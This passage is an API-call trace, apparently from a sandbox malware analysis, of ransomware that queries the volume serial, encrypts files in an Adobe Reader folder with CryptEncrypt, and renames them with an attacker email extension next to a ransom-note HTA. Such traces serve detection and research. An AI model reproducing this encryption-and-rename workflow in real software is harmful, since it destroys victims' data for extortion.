pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36521c4*=8, plFlavor=0x36521c8*=0) returned 0x0 [0209.004] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.004] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.004] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36521c4*=8, plFlavor=0x36521c8*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36521c4*=8, plFlavor=0x36521c8*=0) returned 0x0 [0209.004] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.004] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.004] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm", lpFilePart=0x0) returned 0x36 [0209.004] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x59 [0209.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0209.004] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x35c60020, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0209.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0209.004] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeSKY.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmesky.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0209.006] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", lpFilePart=0x0) returned 0x36 [0209.006] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0209.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0209.006] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0209.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0209.006] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", lpFilePart=0x0) returned 0x36 [0209.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0209.006] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm"), fInfoLevelId=0x0, lpFileInformation=0x3652700 | out: lpFileInformation=0x3652700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4995)) returned 1 [0209.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0209.007] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", lpFilePart=0x0) returned 0x36 [0209.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0209.007] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0209.007] GetFileType (hFile=0x32c) returned 0x1 [0209.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0209.007] GetFileType (hFile=0x32c) returned 0x1 [0209.007] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4995 [0209.007] ReadFile (in: hFile=0x32c, lpBuffer=0x383affc, nNumberOfBytesToRead=0x4995, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x383affc*, lpNumberOfBytesRead=0x8f6eedc*=0x4995, lpOverlapped=0x0) returned 1 [0209.074] CloseHandle (hObject=0x32c) returned 1 [0209.074] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbdf838) returned 1 [0209.075] CryptGenRandom (in: hProv=0xbdf838, dwLen=0x10, pbBuffer=0x3869344 | out: pbBuffer=0x3869344) returned 1 [0209.540] CryptImportKey (in: hProv=0xbdf838, pbData=0x39f5888, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f950) returned 1 [0209.540] CryptContextAddRef (hProv=0xbdf838, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.540] CryptContextAddRef (hProv=0xbdf838, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.540] CryptDuplicateKey (in: hKey=0xb7f950, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7fa10) returned 1 [0209.540] CryptContextAddRef (hProv=0xbdf838, pdwReserved=0x0, dwFlags=0x0) returned 1 [0209.540] CryptSetKeyParam (hKey=0xb7fa10, dwParam=0x4, pbData=0x39f5968*=0x1, dwFlags=0x0) returned 1 [0209.540] CryptSetKeyParam (hKey=0xb7fa10, dwParam=0x1, pbData=0x39f5934, dwFlags=0x0) returned 1 [0209.541] CryptEncrypt (in: hKey=0xb7fa10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39f5978*, pdwDataLen=0x8f6eea8*=0x49a0, dwBufLen=0x49a0 | out: pbData=0x39f5978*, pdwDataLen=0x8f6eea8*=0x49a0) returned 1 [0209.561] CryptEncrypt (in: hKey=0xb7fa10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x39fa33c*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x39fa33c*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0209.562] CryptDestroyKey (hKey=0xb7f950) returned 1 [0209.562] CryptReleaseContext (hProv=0xbdf838, dwFlags=0x0) returned 1 [0209.562] CryptReleaseContext (hProv=0xbdf838, dwFlags=0x0) returned 1 [0209.562] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", lpFilePart=0x0) returned 0x36 [0209.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0209.562] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0209.564] GetFileType (hFile=0x31c) returned 0x1 [0209.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0209.564] GetFileType (hFile=0x31c) returned 0x1 [0209.564] WriteFile (in: hFile=0x31c, lpBuffer=0x39fa944*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x39fa944*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0209.565] CloseHandle (hObject=0x31c) returned 1 [0209.565] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0209.565] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0209.565] CoTaskMemFree (pv=0xbed438) [0209.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0209.565] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0209.565] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0209.565] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0209.565] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.566] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x60274b0) returned 0x0 [0209.566] WbemDefPath:IUnknown:QueryInterface (in: This=0x60274b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0209.566] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60274b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6029f10) returned 0x0 [0209.566] WbemDefPath:IUnknown:Release (This=0x60274b0) returned 0x0 [0209.566] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6029f10) returned 0x0 [0209.566] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0209.567] WbemDefPath:IUnknown:AddRef (This=0x6029f10) returned 0x3 [0209.567] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0209.567] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0209.567] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ce398) returned 0x0 [0209.567] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce398, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.567] WbemDefPath:IUnknown:Release (This=0x66ce398) returned 0x3 [0209.567] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0209.567] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0209.567] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0209.567] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x2 [0209.567] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x1 [0209.567] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0209.567] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0209.567] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6029f10) returned 0x0 [0209.567] WbemDefPath:IUnknown:AddRef (This=0x6029f10) returned 0x3 [0209.567] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x2 [0209.567] WbemDefPath:IWbemPath:SetText (This=0x6029f10, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.567] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0209.567] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0209.567] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.567] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0209.567] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0209.567] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0209.567] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0209.567] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0209.567] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0209.567] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0209.568] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.568] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0209.568] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0209.568] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0209.568] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.568] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x60274d0) returned 0x0 [0209.568] WbemDefPath:IUnknown:QueryInterface (in: This=0x60274d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0209.568] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60274d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6029d50) returned 0x0 [0209.568] WbemDefPath:IUnknown:Release (This=0x60274d0) returned 0x0 [0209.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6029d50) returned 0x0 [0209.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0209.569] WbemDefPath:IUnknown:AddRef (This=0x6029d50) returned 0x3 [0209.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0209.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0209.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66ce228) returned 0x0 [0209.569] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce228, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.569] WbemDefPath:IUnknown:Release (This=0x66ce228) returned 0x3 [0209.569] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0209.569] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0209.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0209.569] WbemDefPath:IUnknown:Release (This=0x6029d50) returned 0x2 [0209.569] WbemDefPath:IUnknown:Release (This=0x6029d50) returned 0x1 [0209.569] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0209.569] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0209.569] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6029d50) returned 0x0 [0209.569] WbemDefPath:IUnknown:AddRef (This=0x6029d50) returned 0x3 [0209.569] WbemDefPath:IUnknown:Release (This=0x6029d50) returned 0x2 [0209.569] WbemDefPath:IWbemPath:SetText (This=0x6029d50, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0209.569] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029d50, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0209.569] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0209.569] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.569] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0209.570] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0209.570] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0209.570] IUnknown:Release (This=0xb51e34) returned 0x1 [0209.570] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x60248d8) returned 0x0 [0209.570] 